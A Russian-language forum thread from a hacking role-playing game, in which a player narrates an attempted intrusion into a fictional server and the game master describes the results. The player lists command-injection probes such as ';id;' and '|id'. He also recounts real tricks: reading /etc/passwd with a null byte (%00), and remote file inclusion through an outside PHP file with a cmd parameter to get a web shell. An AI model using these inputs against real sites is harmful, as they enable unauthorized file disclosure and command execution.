Сообщений в теме: 44

[jaros]

Здесь идёт обсуждение между мной и Shellaur о том, как он выполняет своё секретное задание. Я сделал это общедоступной темой, потому что другим может быть интересно читать, что происходит.

ЭТО ЧАСТЬ ИГРЫ "ДИП-ГЕЙМ-2". ПРОЧИТАТЬ ПРАВИЛА И ПРИСОЕДИНИТЬСЯ К ИГРЕ ВЫ МОЖЕТЕ В ДРУГОЙ ТЕМЕ.

Прошу также всех, кто не участвует в игре, не постить в этой теме, чтобы была видна нить повествования.

[Shellaur]

----------
Так, так, jaros, сожно поподробнее - я дожен стырить *sql базу данных под названием Users, или фойл /etc/passwd с аккунтами пользователей сервера

[jaros]

Одну таблицу users из базы данных SQL (название базы тебе неизвестно). Можешь вместо этого стырить и /etc/passwd и попытаться сбагрить это заказчику. Посмотрим, как он на это отреагирует.

ПС. Ту информацию, которую ты хочешь делать секретной, надо посылать PM-ом мне, а не класть в общем доступе. Можно считать теперь, что твоё задание теперь не секретное.

[Shellaur]

Так, погоди, я только уточная, че как.
Скажи еще, какова будет система взлома.
Типа - я говорю, куда захожу, ты говоришь, что я вижу?

[jaros]

Да. Правда, в зависимости от того, что ты скажешь. Пока ты ещё не в глубине и поэтому воспринимаешь мир, как обычно. То есть перед тобой экран компьютера, а не таинственный коридор, ведущий внутрь сервера. Весь взлом надо проводить осознанно, то есть комментируя, что ты делаешь в реале, а не как это выглядит в дипе. На самом деле, для взлома дип не нужен совсем.

Так что насчёт "куда захожу" — я бы скорее сказал "что набираю на клавиатуре".

[jaros]

Уф. Всё в порядке.

Shellaur: Продолжим?

[Shellaur]

to jaros
Ты так и не ответил, запросы типа "поставляю в Query_String значение ;id;"
сендить тебе ПМом, или постить прямо тут?

[jaros]

Лучше ПМ-ом.

[Shellaur]

ОК. Но что тогда будет ЗДЕСЬ??

[jaros]

Я изменил концепцию игры. Теперь нет секретных сообщений. Играем в открытую в этой теме.

index.php так и остается без параметров при брожении по сайту?
Перловый форум висит на этом не серваке?

Нет, у index.php появляются параметры типа "action=Admin" и "action=Downloads". Параметры всё время начинаются с "action=...", других параметров ты не видел.

Форум работает на том же сервере.

[Shellaur]

прообую подставить вместо значения action следуюсчие параметры:
|id
id|
|id|
;id;
/etc/passwd

Изучаю результат каждого запроса

[jaros]

Безуспешно. Скрипт выдаёт:

Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (/etc/passwd) не существует.

Хм, может я чего не понял, но это что, должно было сработать?

[Shellaur]

а запросы id| |id |id| ;id;
Где результат каждого из этих запросов?
зы. Знаешь иногда работает.
Один раз было вижу www.xxxxxxx.com/cgi-bin/mag.cgi?artid=fresh
Набираю: вижу www.xxxxxxx.com/cgi-bin/mag.cgi?artid=hana
ответ: hana.html не найден
набираю вижу www.xxxxxxx.com/cgi-bin/mag.cgi?artid=/etc/passwd
ответ: /etc/passwd/html не найден
набираю вижу www.xxxxxxx.com/cgi-bin/mag.cgi?artid=/etc/passwd%00
Опаньки. Файл усеров как на ладони. Притом с абсолютным путем,
без извращений типа ../../../../../../etc/passwd%00 .
Если инетресно, могу даже урл того скрипта дать (там 4 или 5 аккаунтов с шеллом)

[Shellaur]

А иногдабываеи еще тупее: в параметре скрипта бывает полное имя типа:
http://www.lohovsy_s...dyrka=file.html
ну, вместо файла добивается http://padlapass.narod.ru/buga.php , добавляется параметр cmd c никсовой командой,
и, если конфиг для php кривой то у нас есть веб-шелл
http://www.lohovsy_s.....&cmd=uname -a

[jaros]

Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (id|) не существует.

Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (|id) не существует.

Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (|id|) не существует.

Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (;id;) не существует.

Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (/etc/passwd) не существует.

(Дело в том, что указывается не имя внешнего файла, который надо показать, а параметр скрипта, по которому он понимает, что надо отобразить. Все данные зашиты в самом скрипте и наружу он за подсказками не лазит.)

[Shellaur]

Если запрос ;id; успешно отфильтровался, значит он не использует функцию system() ?
Если отфильтровались запросы с пайпами, то это значит, что в скрипт вшит парсер, чего не может быть, судя по outputу сервера, значит форум написан на друго скриптовом языке
PS. Скрипт на php иногда даже принимая не имя файла, как аргумент, все рано успешно сожрет файл, если в конфиге явнг не запрещено указывать значение переменной метода GET файл с другого серванта

[jaros]

Мы об одном и том же PHP говорим? Да, скрипт действительно не использует функцию system () — она небезопасна. Причём тут парсер? Чего он парсить должен?

[Shellaur]

Тьфу ты. блин, аж стыдно стало. Твоя правда.
В смысле не парсер, а резалка опасных спецсимволов(/\|;, etc)
И вообще,вроде бы форум перловый, а бага с символом ; присуща обоим языкам, а вот пайпы ПХПом обрабатыватся безглючно.... эх.
доступ из скриптов, использующих метод GET, к какой-нибудь sql-базе есть?

[jaros]

Откуда ж тебе знать. Есть у тебя какой-нибудь способ скачать скрипт, чтобы пропрепарировать его?

Было бы странно, если бы таблица users совсем нигде не использовалась. Немного побродив по сайту, ты наткнулся на процедуру создания нового аккаунта в Лабиринте Смерти. Можешь заполнить анкету и стать полноценным пользователем игры. Только похоже, что форма работает по POSTу, а не по GETу.

[Shellaur]

Что значит "похоже". Если в Квери_Стринг содержит параметры, значит - метод ГЕТ. А расширение какое?
ЗЫ. Ты уже продумал, в каком месте будет дырка в сервере, или же просто импровизируешь?